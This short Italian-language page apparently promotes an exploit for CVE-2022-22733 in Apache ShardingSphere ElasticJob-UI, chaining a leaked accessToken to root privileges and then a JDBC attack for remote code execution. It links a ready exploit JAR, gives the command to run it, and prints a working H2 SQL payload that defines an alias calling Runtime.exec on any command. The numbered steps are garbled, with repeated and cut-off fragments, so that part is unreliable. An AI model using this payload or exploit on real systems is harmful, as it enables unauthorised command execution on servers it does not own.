
Apache ShardingSphere ElasticJob-UI Escalation dei privilegi & Exploit RCE
CVE-2022-22733 è una vulnerabilità che colpisce Apache ShardingSphere ElasticJob-UI 3.0.0 e versioni precedenti, la vulnerabilità porta a Privilege Escalation. Inoltre, abusando dei privilegi elevati, è possibile effettuare un attacco JDBC e ottenere RCE. Puoi leggere l'analisi della vulnerabilità Qui e il blog sulla scrittura dell'exploit passo dopo passo Qui.

L'Exploit funziona come segue:
accessToken generato in modo non sicuro.accessToken generato in modo non sicuro.accessToken.root dai dati analizzati.root e ottieni privilegi completi sull'applicazione.JDBC.Puoi scaricare il file JAR da qui e il codice sorgente da qui.
jar:java -jar CVE-2022-22733.jar
CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "123";}';CALL EXEC ('your_command_here')
